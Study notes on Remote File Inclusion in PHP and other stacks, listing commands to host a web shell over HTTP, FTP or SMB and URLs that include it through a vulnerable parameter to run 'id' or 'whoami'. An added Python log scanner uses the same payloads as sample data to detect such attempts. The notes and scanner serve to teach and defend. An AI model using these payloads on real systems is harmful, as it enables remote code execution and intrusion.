RFI

  • https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
  • 2 main benefits:
    1. Enumerating local-only ports and web applications (i.e. SSRF)
    2. Gaining remote code execution by including a malicious script that we host

RFI

  • Remote File Inclusion
  • When a vulnerable function allows us to include remote files, we may be able to host a malicious script, and then include it in the vulnerable page to execute malicious functions and gain remote code execution.
Functions that may allow remote URLs (original table columns: Function, Read Content, Execute, Remote URL):

  • PHP: include()/include_once(), file_get_contents()
  • Java: import
  • .NET: @Html.RemotePartial(), include

### Verify RFI
- Check for allow_url_include from PHP Wrappers.
- Then, include a URL in the parameter that is vulnerable.
- e.g.: http://SERVER:PORT/index.php?language=http://127.0.0.1/index.php
- If this works, then the page is vulnerable to RFI.
- Also notice that the page got included and the source code was not displayed.
- This means the code is being executed. This can be used to include a malicious PHP script that we host on our machine.

## Remote Code Execution with RFI
- Create the malicious script.
- Now host the script on known ports like 80, 443, 21, 138/445.
### Hosting on HTTP:
- sudo python3 -m http.server 80
- http://SERVER:PORT/index.php?language=http://OUR_IP/shell.php?cmd=id
### Hosting on FTP:
- sudo python -m pyftpdlib -p 21
- http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
- If credentials are required to access the ftp server:
- http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id

### Hosting on SMB:
- impacket-smbserver -smb2support share /tmp/smbshare
- Provide the UNC path in the URL:
- http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami
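
From the defending side, all three inclusion forms above (http://, ftp:// and a UNC path) leave a recognisable value in the web server's access log. The following is an added example, not part of the original notes: it flags any query parameter whose decoded value starts with a URL scheme or UNC prefix, including percent-encoded and double-encoded variants. The log lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 512
203.0.113.7 - - [10/Mar/2024:10:00:05 +0000] "GET /index.php?language=http://198.51.100.9/shell.php&cmd=id HTTP/1.1" 200 733
203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /index.php?language=ftp%3A%2F%2Fuser%3Apass%40198.51.100.9%2Fshell.php&cmd=id HTTP/1.1" 200 733
203.0.113.7 - - [10/Mar/2024:10:00:12 +0000] "GET /index.php?language=%5C%5C198.51.100.9%5Cshare%5Cshell.php&cmd=whoami HTTP/1.1" 200 733
203.0.113.7 - - [10/Mar/2024:10:00:15 +0000] "GET /index.php?language=http%253A%252F%252F198.51.100.9%252Fshell.php HTTP/1.1" 200 733
198.51.100.20 - - [10/Mar/2024:10:01:00 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 420
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value begins with scheme:// (http, ftp, also php:// or data://) or a UNC prefix.
REMOTE_RE = re.compile(r'^(?:(?P<scheme>[a-z][a-z0-9+.-]*)://|(?P<unc>\\\\|//))', re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253A -> %3A -> :)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return 'unc', the lower-cased scheme, or None for a local-looking value."""
    m = REMOTE_RE.match(fully_decode(value).strip())
    if not m:
        return None
    return "unc" if m.group("unc") else m.group("scheme").lower()

def find_rfi_attempts(log_text):
    """Return (client, parameter, kind, decoded value) for each suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                findings.append((client, param, kind, fully_decode(value)))
    return findings

if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_LOG):
        print(finding)
```

Redirect-style parameters that legitimately carry URLs will also match, so triage hits by parameter name and by whether the referenced host is one of yours. On PHP, keeping allow_url_include off removes the http:// and ftp:// cases, while the UNC case on a Windows host does not depend on that setting.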